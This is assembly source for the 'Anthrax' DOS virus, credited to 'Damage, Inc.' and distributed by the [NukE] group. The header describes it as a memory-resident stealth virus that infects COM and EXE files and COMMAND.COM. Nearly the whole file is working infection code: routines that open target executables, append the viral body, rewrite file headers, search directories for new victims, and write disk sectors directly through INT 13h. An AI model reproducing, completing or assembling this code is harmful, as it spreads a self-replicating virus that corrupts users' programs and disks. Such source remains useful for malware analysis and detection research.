
;**************************************************************************
;** ANTHRAX VIRUS **
;** Created: 2 Jan 90 Programmer: (c) Damage, Inc. **
;** [NukE] Notes: Another stealth-type virus, and this one is detected **
;** by Scan (McAfee & Assc.). It copies itself to *.COM, **
;** *.EXE and Command.Com, and is memory resident! **
;** **
;** Sources brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
.286p
DATA_1E EQU 46CH ; (0000:046C=2DH)
DATA_2E EQU 4 ; (65AC:0004=0)
DATA_3E EQU 7 ; (65AC:0007=0)
DATA_10E EQU 5FEH ; (65AC:05FE=0)
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h
ANTHRAX PROC FAR
START:
JMP LOC_24 ; (043B)
DB 13 DUP (0)
DB 95H, 8CH, 0C8H, 2DH, 0, 0
DB 0BAH, 0, 0, 50H, 52H, 1EH
DB 33H, 0C9H, 8EH, 0D9H, 0BEH, 4CH
DB 0, 0B8H, 0CDH, 0, 8CH, 0CAH
DB 87H, 44H, 44H, 87H, 54H, 46H
DB 52H, 50H, 0C4H, 1CH, 0B4H, 13H
DB 0CDH, 2FH, 6, 53H, 0B4H, 13H
DB 0CDH, 2FH, 58H, 5AH, 87H, 4
DB 87H, 54H, 2, 52H, 50H, 51H
DB 56H, 0A0H, 3FH, 4, 0A8H, 0FH
DB 75H, 6CH, 0EH, 7, 0BAH, 80H
DB 0, 0B1H, 3, 0BBH, 77H, 6
DB 0B8H, 1, 2, 50H, 0CDH, 13H
DB 58H, 0B1H, 1, 0BBH, 0, 4
DB 0CDH, 13H, 0EH, 1FH, 0BEH, 9BH
DB 3, 8BH, 0FBH, 0B9H, 5EH, 0
DB 56H, 0F3H, 0A6H, 5EH, 8BH, 0FBH
DB 0B9H, 62H, 0, 56H, 0F3H, 0A4H
DB 5FH, 0BEH, 12H, 8, 0B9H, 65H
DB 0, 0F3H, 0A4H, 74H, 1EH, 89H
DB 4DH, 0E9H, 0B1H, 5CH, 89H, 4DH
DB 9BH, 88H, 6DH, 0DCH, 0B1H, 2
DB 33H, 0DBH, 0B8H, 2, 3, 0CDH
DB 13H, 49H, 0BBH, 0, 4, 0B8H
DB 1, 3, 0CDH, 13H, 49H, 0B4H
DB 19H, 0CDH, 21H, 50H, 0B2H, 2
DB 0B4H, 0EH, 0CDH, 21H, 0B7H, 2
DB 0E8H, 87H, 1, 5AH, 0B4H, 0EH
DB 0CDH, 21H, 5EH, 1FH, 8FH, 4
DB 8FH, 44H, 2, 8FH, 44H, 44H
DB 8FH, 44H, 46H, 1FH, 1EH, 7
DB 95H, 0CBH
copyright DB '(c) Damage, Inc.'
DB 0, 0B0H, 3, 0CFH, 6, 1EH
DB 57H, 56H, 50H, 33H, 0C0H, 8EH
DB 0D8H, 0BEH, 86H, 0, 0EH, 7
DB 0BFH, 8, 6, 0FDH, 0ADH, 0ABH
DB 0A5H, 0AFH, 87H, 0F7H, 0ADH, 0FCH
DB 74H, 11H, 1EH, 7, 0AFH, 0B8H
DB 7, 1, 0ABH, 8CH, 0C8H, 0ABH
DB 8EH, 0D8H, 0BFH, 68H, 0, 0A5H
DB 0A5H, 58H, 5EH, 5FH, 1FH, 7
DB 2EH, 0FFH, 2EH, 0, 6, 6
DB 1EH, 57H, 56H, 52H, 51H, 53H
DB 50H, 0EH, 1FH, 0BEH, 6, 6
DB 33H, 0C9H, 8EH, 0C1H, 0BFH, 84H
DB 0, 0A5H, 0A5H, 0B4H, 52H, 0CDH
DB 21H, 26H, 8BH, 47H, 0FEH, 8EH
DB 0D8H, 0BBH, 3, 0, 3, 7
DB 40H, 8EH, 0D8H, 81H, 7, 80H
DB 0, 0EH, 7, 0B7H, 12H, 0E8H
DB 0F2H, 0, 58H, 5BH, 59H, 5AH
DB 5EH, 5FH, 1FH, 7, 2EH, 0FFH
DB 2EH, 6, 6
LOC_RET_1:
RETN
DB 91H, 0AEH, 0B4H, 0A8H, 0BFH
DB 20H, 31H, 39H, 39H, 30H
ANTHRAX ENDP
;--------------------------------------------------------------------------
; SUBROUTINE
;--------------------------------------------------------------------------
SUB_1 PROC NEAR
MOV AX,3D00H
INT 21H ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
JC LOC_RET_1 ; Jump if carry Set
XCHG AX,BX
MOV AX,1220H
INT 2FH ; Multiplex/Spooler al=func 20h
PUSH BX
MOV BL,ES:[DI]
MOV AX,1216H
INT 2FH ; Multiplex/Spooler al=func 16h
POP BX
MOV SI,462H
MOV DX,SI
MOV CL,18H
MOV AH,3FH ; '?'
INT 21H ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
XOR AX,CX
JNZ LOC_7 ; Jump if not zero
PUSH ES
POP DS
MOV BYTE PTR [DI+2],2
XOR DX,DX ; Zero register
LOC_2:
IN AL,DX ; port 0, DMA-1 bas&add ch 0
CMP AL,10H
JB LOC_2 ; Jump if below
ADD AX,[DI+11H]
ADC DX,[DI+13H]
AND AL,0F0H
CMP AX,0FB00H
JAE LOC_7 ; Jump if above or =
MOV [DI+15H],AX
MOV [DI+17H],DX
PUSH CS
POP DS
PUSH AX
MOV CL,10H
DIV CX ; ax,dx rem=dx:ax/reg
SUB AX,[SI+8]
MOV CX,AX
SUB AX,[SI+16H]
MOV DS:DATA_2E,AX ; (65AC:0004=0)
LODSW ; String [si] to ax
XOR AX,5A4DH
JZ LOC_3 ; Jump if zero
XOR AX,1717H
LOC_3:
PUSHF ; Push flags
JNZ LOC_4 ; Jump if not zero
MOV [SI],AX
CMP AX,[SI+0AH]
XCHG AX,[SI+12H]
MOV DS:DATA_3E,AX ; (65AC:0007=0)
MOV [SI+14H],CX
MOV CX,4DCH
JZ LOC_5 ; Jump if zero
ADD WORD PTR [SI+8],48H
LOC_4:
MOV CX,65H
LOC_5:
PUSH CX
MOV CX,39BH
MOV AH,40H ; '@'
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
XOR CX,AX
POP CX
JNZ LOC_6 ; Jump if not zero
MOV DX,400H
MOV AH,40H ; '@'
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
XOR CX,AX
LOC_6:
POP DX
POP AX
LOC_7:
JNZ LOC_11 ; Jump if not zero
MOV ES:[DI+15H],CX
MOV ES:[DI+17H],CX
PUSH DX
POPF ; Pop flags
JNZ LOC_9 ; Jump if not zero
MOV AX,ES:[DI+11H]
MOV DX,ES:[DI+13H]
MOV CH,2
DIV CX ; ax,dx rem=dx:ax/reg
TEST DX,DX
JZ LOC_8 ; Jump if zero
INC AX
LOC_8:
MOV [SI],DX
MOV [SI+2],AX
JMP SHORT LOC_10 ; (0328)
LOC_9:
MOV BYTE PTR [SI-2],0E9H
ADD AX,328H
MOV [SI-1],AX
LOC_10:
MOV CX,18H
LEA DX,[SI-2] ; Load effective addr
MOV AH,40H ; '@'
INT 21H ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
LOC_11:
OR BYTE PTR ES:[DI+6],40H ; '@'
MOV AH,3EH ; '>'
LOC_12:
INT 21H ; DOS Services ah=function 3Eh
; close file, bx=file handle
RETN
SUB_1 ENDP
;--------------------------------------------------------------------------
; SUBROUTINE
;--------------------------------------------------------------------------
SUB_2 PROC NEAR
MOV DS,CX
MOV BL,DS:DATA_1E ; (0000:046C=34H)
PUSH CS
POP DS
INC DATA_7 ; (65AC:045E=0FC00H)
MOV DX,64BH
CALL SUB_3 ; (036D)
MOV SI,60AH
MOV BYTE PTR [SI],5CH ; '\'
INC SI
XOR DL,DL ; Zero register
MOV AH,47H ; 'G'
INT 21H ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
MOV DX,39BH
LOC_13:
MOV AH,3BH ; ';'
INT 21H ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
JCXZ LOC_14 ; Jump if cx=0
MOV AH,51H ; 'Q'
INT 21H ; DOS Services ah=function 51h
; get active PSP segment in bx
MOV DS,BX
MOV DX,80H
;<3B><><EFBFBD><EFBFBD> External Entry into Subroutine <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
SUB_3:
MOV AH,1AH
JMP SHORT LOC_12 ; (0339)
LOC_14:
JC LOC_17 ; Jump if carry Set
MOV SI,39CH
XOR DL,DL ; Zero register
MOV AH,47H ; 'G'
INT 21H ; DOS Services ah=function 47h
; get present dir,drive dl,1=a:
CMP CH,BYTE PTR DS:[3DCH] ; (65AC:03DC=81H)
LOC_15:
MOV CL,32H ; '2'
MOV DX,29DH
MOV AH,4EH ; 'N'
JZ LOC_20 ; Jump if zero
INT 21H ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
JC LOC_17 ; Jump if carry Set
LOC_16:
MOV DX,64BH
MOV AX,4F01H
MOV SI,3DCH
MOV DI,668H
STOSB ; Store al to es:[di]
MOV CL,0DH
REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di]
JZ LOC_20 ; Jump if zero
CMP CH,[DI-2]
JE LOC_20 ; Jump if equal
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JNC LOC_16 ; Jump if carry=0
XOR AL,AL ; Zero register
JMP SHORT LOC_15 ; (0380)
DB 2AH, 2EH, 2AH, 0
LOC_17:
MOV CL,41H ; 'A'
MOV DI,39CH
CMP CH,[DI]
MOV AL,CH
MOV BYTE PTR DS:[3DCH],AL ; (65AC:03DC=81H)
JZ LOC_23 ; Jump if zero
REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al
DEC DI
MOV CL,41H ; 'A'
MOV AL,5CH ; '\'
STD ; Set direction flag
REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al
LEA SI,[DI+2] ; Load effective addr
MOV DI,3DCH
CLD ; Clear direction
LOC_18:
LODSB ; String [si] to al
TEST AL,AL
STOSB ; Store al to es:[di]
JNZ LOC_18 ; Jump if not zero
MOV DX,2CDH
XOR CL,CL ; Zero register
JMP SHORT LOC_13 ; (035E)
DB 2EH, 2EH, 0
LOC_19:
MOV DX,64BH
MOV AH,4FH ; 'O'
LOC_20:
INT 21H ; DOS Services ah=function 4Fh
; find next filename match
JC LOC_17 ; Jump if carry Set
DATA_6 DW 69BEH
DB 6, 0BFH, 0DCH, 3, 80H, 3CH
DB 2EH, 74H, 0ECH, 88H, 2DH, 8BH
DB 0D6H, 0F6H, 44H, 0F7H, 10H, 75H
DB 0DBH
LOC_21:
LODSB ; String [si] to al
TEST AL,AL
STOSB ; Store al to es:[di]
JNZ LOC_21 ; Jump if not zero
DEC SI
STD ; Set direction flag
LODSW ; String [si] to ax
LODSW ; String [si] to ax
CLD ; Clear direction
CMP AX,4558H
JE LOC_22 ; Jump if equal
CMP AX,4D4FH
JNE LOC_19 ; Jump if not equal
LOC_22:
PUSH BX
CALL SUB_1 ; (0262)
POP BX
XOR CX,CX ; Zero register
MOV ES,CX
MOV AL,ES:DATA_1E ; (0000:046C=38H)
PUSH CS
POP ES
SUB AL,BL
CMP AL,BH
JB LOC_19 ; Jump if below
LOC_23:
MOV DX,80H
MOV CL,3
MOV BX,200H
MOV AX,301H
INT 13H ; Disk dl=drive 0: ah=func 03h
; write sectors from mem es:bx
MOV DX,60AH
JMP LOC_13 ; (035E)
SUB_2 ENDP
LOC_24:
XCHG AX,BP
MOV DI,100H
MOV BX,[DI+1]
SUB BX,228H
MOV AX,DI
LEA SI,[BX+3FDH] ; Load effective addr
MOVSW ; Mov [si] to es:[di]
MOVSB ; Mov [si] to es:[di]
XCHG AX,BX
MOV CL,4
SHR AX,CL ; Shift w/zeros fill
MOV CX,DS
ADD AX,CX
MOV DX,0BH
JMP SHORT LOC_26 ; (04CD)
DB 0B8H, 0D0H
DATA_7 DW 0FC00H
DATA_8 DW 8587H
DB 68H, 0FAH, 0ABH, 8CH, 0C8H, 0E2H
DB 0F7H, 0A3H, 86H, 0, 0ABH, 8EH
DB 0D8H, 0B4H, 8, 0CDH, 13H, 49H
DB 49H, 0A1H, 0E9H, 3, 84H, 0E4H
DB 74H, 1, 91H, 0B2H, 80H, 0B8H
DB 3, 3, 0CDH, 13H, 91H, 84H
DB 0E4H, 75H, 2
DB 2CH, 40H
LOC_25:
DEC AH
MOV DATA_6,AX ; (65AC:03E9=69BEH)
INC DATA_8 ; (65AC:0460=8587H)
XOR DH,DH ; Zero register
MOV CX,1
MOV BX,400H
MOV AX,301H
INT 13H ; Disk dl=drive ?: ah=func 03h
; write sectors from mem es:bx
MOV DL,DH
RETF ; Return far
DB 41H, 4EH, 54H, 48H, 52H, 41H
DB 58H, 0EH, 1FH, 83H, 2EH, 13H
DB 4, 2, 0CDH, 12H, 0B1H, 6
DB 0D3H, 0E0H, 8EH, 0C0H, 0BFH, 0
DB 4, 0BEH, 0, 7CH, 0B9H, 0
DB 1, 8BH, 0DEH, 0FCH, 0F3H, 0A5H
DB 8EH, 0D8H, 0BAH, 27H, 4
LOC_26:
PUSH CX
PUSH BX
PUSH AX
PUSH DX
RETF ; Return far
DB 8EH, 0C1H, 0B1H, 4, 0BEH, 0B0H
DB 5
LOCLOOP_27:
ADD SI,0EH
LODSW ; String [si] to ax
CMP AL,80H
JE LOC_29 ; Jump if equal
LOOP LOCLOOP_27 ; Loop if cx > 0
LOC_28:
INT 18H ; ROM basic
LOC_29:
XCHG AX,DX
STD ; Set direction flag
LODSW ; String [si] to ax
XCHG AX,CX
MOV AX,201H
INT 13H ; Disk dl=drive a: ah=func 02h
; read sectors to memory es:bx
CMP WORD PTR DS:DATA_10E,0AA55H ; (65AC:05FE=0)
JNE LOC_28 ; Jump if not equal
PUSH ES
PUSH DS
POP ES
POP DS
XOR DH,DH ; Zero register
MOV CX,2
XOR BX,BX ; Zero register
MOV AX,202H
INT 13H ; Disk dl=drive a: ah=func 02h
; read sectors to memory es:bx
JMP $-10FH
DB 0, 0, 0, 0, 0CDH, 20H
DB 0CCH
DB 112 DUP (1AH)
SEG_A ENDS
END START